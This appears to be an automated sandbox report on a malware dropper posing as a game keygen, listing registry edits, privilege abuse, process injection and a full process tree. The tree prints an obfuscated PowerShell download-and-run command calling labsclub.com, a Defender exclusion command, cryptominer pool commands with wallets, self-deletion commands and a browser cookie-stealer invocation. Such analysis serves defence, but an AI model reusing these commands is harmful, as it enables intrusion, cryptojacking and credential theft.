\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = "1" 2.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\MigrationTime = 6c3a3b6c55add601 2.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0" 2.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 4356 reg.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 askinstall20.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e askinstall20.exe -
Runs ping.exe 1 TTPs 5 IoCs
pid Process 8868 PING.EXE 6504 PING.EXE 2780 PING.EXE 4704 PING.EXE 5316 PING.EXE -
Script User-Agent 8 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 308 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 322 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 577 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 582 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 685 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 701 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 138 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 144 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2492 setups.tmp 2492 setups.tmp -
Suspicious use of AdjustPrivilegeToken 41 IoCs
description pid Process Token: SeDebugPrivilege 1720 Setup.exe Token: SeCreateTokenPrivilege 184 askinstall20.exe Token: SeAssignPrimaryTokenPrivilege 184 askinstall20.exe Token: SeLockMemoryPrivilege 184 askinstall20.exe Token: SeIncreaseQuotaPrivilege 184 askinstall20.exe Token: SeMachineAccountPrivilege 184 askinstall20.exe Token: SeTcbPrivilege 184 askinstall20.exe Token: SeSecurityPrivilege 184 askinstall20.exe Token: SeTakeOwnershipPrivilege 184 askinstall20.exe Token: SeLoadDriverPrivilege 184 askinstall20.exe Token: SeSystemProfilePrivilege 184 askinstall20.exe Token: SeSystemtimePrivilege 184 askinstall20.exe Token: SeProfSingleProcessPrivilege 184 askinstall20.exe Token: SeIncBasePriorityPrivilege 184 askinstall20.exe Token: SeCreatePagefilePrivilege 184 askinstall20.exe Token: SeCreatePermanentPrivilege 184 askinstall20.exe Token: SeBackupPrivilege 184 askinstall20.exe Token: SeRestorePrivilege 184 askinstall20.exe Token: SeShutdownPrivilege 184 askinstall20.exe Token: SeDebugPrivilege 184 askinstall20.exe Token: SeAuditPrivilege 184 askinstall20.exe Token: SeSystemEnvironmentPrivilege 184 askinstall20.exe Token: SeChangeNotifyPrivilege 184 askinstall20.exe Token: SeRemoteShutdownPrivilege 184 askinstall20.exe Token: SeUndockPrivilege 184 askinstall20.exe Token: SeSyncAgentPrivilege 184 askinstall20.exe Token: SeEnableDelegationPrivilege 184 askinstall20.exe Token: SeManageVolumePrivilege 184 askinstall20.exe Token: SeImpersonatePrivilege 184 askinstall20.exe Token: SeCreateGlobalPrivilege 184 askinstall20.exe Token: 31 184 askinstall20.exe Token: 32 184 askinstall20.exe Token: 33 184 askinstall20.exe Token: 34 184 askinstall20.exe Token: 35 184 askinstall20.exe Token: SeDebugPrivilege 2924 multitimer.exe Token: SeDebugPrivilege 2096 taskkill.exe Token: SeDebugPrivilege 4104 2.exe Token: SeDebugPrivilege 4104 2.exe Token: SeDebugPrivilege 4104 2.exe Token: SeDebugPrivilege 4104 2.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 3004 setups.exe 2492 setups.tmp 4104 2.exe -
Suspicious use of WriteProcessMemory 46 IoCs
description pid Process procid_target PID 1908 wrote to memory of 64 1908 Test_Drive_Unlimited_2_keygen.exe 79 PID 1908 wrote to memory of 64 1908 Test_Drive_Unlimited_2_keygen.exe 79 PID 1908 wrote to memory of 64 1908 Test_Drive_Unlimited_2_keygen.exe 79 PID 64 wrote to memory of 3100 64 cmd.exe 82 PID 64 wrote to memory of 3100 64 cmd.exe 82 PID 64 wrote to memory of 3100 64 cmd.exe 82 PID 64 wrote to memory of 3368 64 cmd.exe 83 PID 64 wrote to memory of 3368 64 cmd.exe 83 PID 64 wrote to memory of 3368 64 cmd.exe 83 PID 64 wrote to memory of 3484 64 cmd.exe 84 PID 64 wrote to memory of 3484 64 cmd.exe 84 PID 64 wrote to memory of 3484 64 cmd.exe 84 PID 64 wrote to memory of 3028 64 cmd.exe 85 PID 64 wrote to memory of 3028 64 cmd.exe 85 PID 64 wrote to memory of 3028 64 cmd.exe 85 PID 3100 wrote to memory of 3240 3100 keygen-pr.exe 86 PID 3100 wrote to memory of 3240 3100 keygen-pr.exe 86 PID 3100 wrote to memory of 3240 3100 keygen-pr.exe 86 PID 3028 wrote to memory of 1720 3028 keygen-step-4.exe 87 PID 3028 wrote to memory of 1720 3028 keygen-step-4.exe 87 PID 3240 wrote to memory of 1452 3240 key.exe 88 PID 3240 wrote to memory of 1452 3240 key.exe 88 PID 3240 wrote to memory of 1452 3240 key.exe 88 PID 3484 wrote to memory of 3936 3484 keygen-step-3.exe 89 PID 3484 wrote to memory of 3936 3484 keygen-step-3.exe 89 PID 3484 wrote to memory of 3936 3484 keygen-step-3.exe 89 PID 3936 wrote to memory of 2780 3936 cmd.exe 91 PID 3936 wrote to memory of 2780 3936 cmd.exe 91 PID 3936 wrote to memory of 2780 3936 cmd.exe 91 PID 1720 wrote to memory of 2924 1720 Setup.exe 92 PID 1720 wrote to memory of 2924 1720 Setup.exe 92 PID 1720 wrote to memory of 3004 1720 Setup.exe 93 PID 1720 wrote to memory of 3004 1720 Setup.exe 93 PID 1720 wrote to memory of 3004 1720 Setup.exe 93 PID 3028 wrote to memory of 184 3028 keygen-step-4.exe 94 PID 3028 wrote to memory of 184 3028 keygen-step-4.exe 94 PID 3028 wrote to memory of 184 3028 keygen-step-4.exe 94 PID 3004 wrote to memory of 2492 3004 setups.exe 95 PID 3004 wrote to memory of 2492 3004 setups.exe 95 PID 3004 wrote to memory of 2492 3004 setups.exe 95 PID 184 wrote to memory of 3984 184 askinstall20.exe 97 PID 184 wrote to memory of 3984 184 askinstall20.exe 97 PID 184 wrote to memory of 3984 184 askinstall20.exe 97 PID 3984 wrote to memory of 2096 3984 cmd.exe 99 PID 3984 wrote to memory of 2096 3984 cmd.exe 99 PID 3984 wrote to memory of 2096 3984 cmd.exe 99
Processes
-
C:\Users\Admin\AppData\Local\Temp\Test_Drive_Unlimited_2_keygen.exe"C:\Users\Admin\AppData\Local\Temp\Test_Drive_Unlimited_2_keygen.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1908 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:64 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3100 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3240 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat5⤵PID:1452
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
PID:3368
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3484 -
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:3936 -
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
PID:2780
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3028 -
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1720 -
C:\Users\Admin\AppData\Local\Temp\1UGAUJ1K6S\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\1UGAUJ1K6S\multitimer.exe" 0 3060197d33d91c80.94013368 0 1015⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2924 -
C:\Users\Admin\AppData\Local\Temp\1UGAUJ1K6S\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\1UGAUJ1K6S\multitimer.exe" 1 3.1617513199.60694aeff1ed9 1016⤵PID:4544
-
C:\Users\Admin\AppData\Local\Temp\1UGAUJ1K6S\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\1UGAUJ1K6S\multitimer.exe" 2 3.1617513199.60694aeff1ed97⤵PID:4664
-
C:\Users\Admin\AppData\Local\Temp\ymyiukjvt5x\iruagfogfzw.exe"C:\Users\Admin\AppData\Local\Temp\ymyiukjvt5x\iruagfogfzw.exe" /VERYSILENT8⤵PID:4880
-
C:\Users\Admin\AppData\Local\Temp\is-T07AM.tmp\iruagfogfzw.tmp"C:\Users\Admin\AppData\Local\Temp\is-T07AM.tmp\iruagfogfzw.tmp" /SL5="$1031A,2592217,780800,C:\Users\Admin\AppData\Local\Temp\ymyiukjvt5x\iruagfogfzw.exe" /VERYSILENT9⤵PID:5256
-
C:\Users\Admin\AppData\Local\Temp\is-5JC09.tmp\winlthsth.exe"C:\Users\Admin\AppData\Local\Temp\is-5JC09.tmp\winlthsth.exe"10⤵PID:5824
-
C:\Users\Admin\AppData\Local\Temp\FLSID43zE.exe"C:\Users\Admin\AppData\Local\Temp\FLSID43zE.exe"11⤵PID:856
-
C:\Windows\SysWOW64\at.exe"C:\Windows\System32\at.exe"12⤵PID:4948
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Marito.gif12⤵PID:7900
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe13⤵PID:6960
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"11⤵PID:6512
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"12⤵PID:4848
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ih4yjijv5ki\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\ih4yjijv5ki\cpyrix.exe" /VERYSILENT8⤵PID:5128
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe9⤵PID:1592
-
C:\Users\Admin\AppData\Local\Temp\c4ceda77-4441-4d93-be20-d8c498d73fcb\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\c4ceda77-4441-4d93-be20-d8c498d73fcb\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\c4ceda77-4441-4d93-be20-d8c498d73fcb\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run10⤵PID:5840
-
C:\Users\Admin\AppData\Local\Temp\c4ceda77-4441-4d93-be20-d8c498d73fcb\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\c4ceda77-4441-4d93-be20-d8c498d73fcb\AdvancedRun.exe" /SpecialRun 4101d8 584011⤵PID:5420
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1.exe" -Force10⤵PID:6444
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 110⤵PID:3132
-
C:\Windows\SysWOW64\timeout.exetimeout 111⤵
- Delays execution with timeout.exe
PID:1268
-
-
-
C:\Users\Admin\AppData\Roaming\1.exe"C:\Users\Admin\AppData\Roaming\1.exe"10⤵PID:2164
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1592 -s 192010⤵
- Program crash
PID:4136
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe9⤵PID:6196
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"10⤵PID:4300
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\qe2ndlgdtke\vpn.exe"C:\Users\Admin\AppData\Local\Temp\qe2ndlgdtke\vpn.exe" /silent /subid=4828⤵PID:5392
-
C:\Users\Admin\AppData\Local\Temp\is-3B6IP.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-3B6IP.tmp\vpn.tmp" /SL5="$2035E,15170975,270336,C:\Users\Admin\AppData\Local\Temp\qe2ndlgdtke\vpn.exe" /silent /subid=4829⤵PID:5616
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "10⤵PID:5712
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap090111⤵PID:1344
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "10⤵PID:6348
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap090111⤵PID:6236
-
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall10⤵PID:1608
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install10⤵PID:5776
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\aoencrf4wim\xeetzqvbsqa.exe"C:\Users\Admin\AppData\Local\Temp\aoencrf4wim\xeetzqvbsqa.exe" /quiet SILENT=1 AF=7568⤵PID:5584
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=756 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\aoencrf4wim\xeetzqvbsqa.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\aoencrf4wim\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1617254117 /quiet SILENT=1 AF=756 " AF="756" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912"9⤵PID:5984
-
-
-
C:\Users\Admin\AppData\Local\Temp\vtyth3ixulc\IBInstaller_97039.exe"C:\Users\Admin\AppData\Local\Temp\vtyth3ixulc\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq8⤵PID:5356
-
-
C:\Users\Admin\AppData\Local\Temp\medrwbfgszl\app.exe"C:\Users\Admin\AppData\Local\Temp\medrwbfgszl\app.exe" /8-238⤵PID:5336
-
-
C:\Users\Admin\AppData\Local\Temp\4iy555r3g1t\vknwj0sgc0c.exe"C:\Users\Admin\AppData\Local\Temp\4iy555r3g1t\vknwj0sgc0c.exe"8⤵PID:5328
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\4iy555r3g1t\vknwj0sgc0c.exe"9⤵PID:5876
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 300010⤵
- Runs ping.exe
PID:5316
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3kay0ub0wuw\rd0pvc40ctk.exe"C:\Users\Admin\AppData\Local\Temp\3kay0ub0wuw\rd0pvc40ctk.exe" /ustwo INSTALL8⤵PID:5212
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "rd0pvc40ctk.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\3kay0ub0wuw\rd0pvc40ctk.exe" & exit9⤵PID:7052
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "rd0pvc40ctk.exe" /f10⤵
- Kills process with taskkill
PID:3740
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\qg2mwtvnvf2\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\qg2mwtvnvf2\Setup3310.exe" /Verysilent /subid=5778⤵PID:4916
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\KA26XXEWX5\setups.exe"C:\Users\Admin\AppData\Local\Temp\KA26XXEWX5\setups.exe" ll5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3004 -
C:\Users\Admin\AppData\Local\Temp\is-F1OO3.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-F1OO3.tmp\setups.tmp" /SL5="$4011A,635399,250368,C:\Users\Admin\AppData\Local\Temp\KA26XXEWX5\setups.exe" ll6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:2492
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:184 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵
- Suspicious use of WriteProcessMemory
PID:3984 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2096
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full_Version.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full_Version.exe"4⤵PID:4644
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"5⤵PID:4764
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install6⤵PID:4908
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"4⤵PID:4800
-
C:\Users\Admin\AppData\Roaming\9E1A.tmp.exe"C:\Users\Admin\AppData\Roaming\9E1A.tmp.exe"5⤵PID:1404
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 999996⤵PID:4556
-
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 99996⤵PID:5296
-
-
-
C:\Users\Admin\AppData\Roaming\A04E.tmp.exe"C:\Users\Admin\AppData\Roaming\A04E.tmp.exe"5⤵PID:648
-
C:\Windows\SysWOW64\cmd.exe/c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\A04E.tmp.exe6⤵PID:4200
-
C:\Windows\SysWOW64\timeout.exetimeout /t 37⤵
- Delays execution with timeout.exe
PID:212
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"5⤵PID:632
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
PID:4704
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"4⤵PID:1264
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"4⤵PID:4832
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"4⤵PID:5384
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:10248
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:11164
-
-
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:4104
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:4156
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:4376
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:4444
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:5044
-
C:\Users\Admin\AppData\Local\Temp\is-FH22R.tmp\IBInstaller_97039.tmp"C:\Users\Admin\AppData\Local\Temp\is-FH22R.tmp\IBInstaller_97039.tmp" /SL5="$2035C,14575144,721408,C:\Users\Admin\AppData\Local\Temp\vtyth3ixulc\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq1⤵PID:5596
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-CMHE3.tmp\{app}\microsoft.cab -F:* %ProgramData%2⤵PID:6136
-
C:\Windows\SysWOW64\expand.exeexpand C:\Users\Admin\AppData\Local\Temp\is-CMHE3.tmp\{app}\microsoft.cab -F:* C:\ProgramData3⤵PID:3904
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-LJ9C5.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-LJ9C5.tmp\Setup3310.tmp" /SL5="$20316,138429,56832,C:\Users\Admin\AppData\Local\Temp\qg2mwtvnvf2\Setup3310.exe" /Verysilent /subid=5771⤵PID:5244
-
C:\Users\Admin\AppData\Local\Temp\is-BE1A0.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-BE1A0.tmp\Setup.exe" /Verysilent2⤵PID:5324
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"3⤵PID:5272
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:4532
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:4652
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"3⤵PID:4008
-
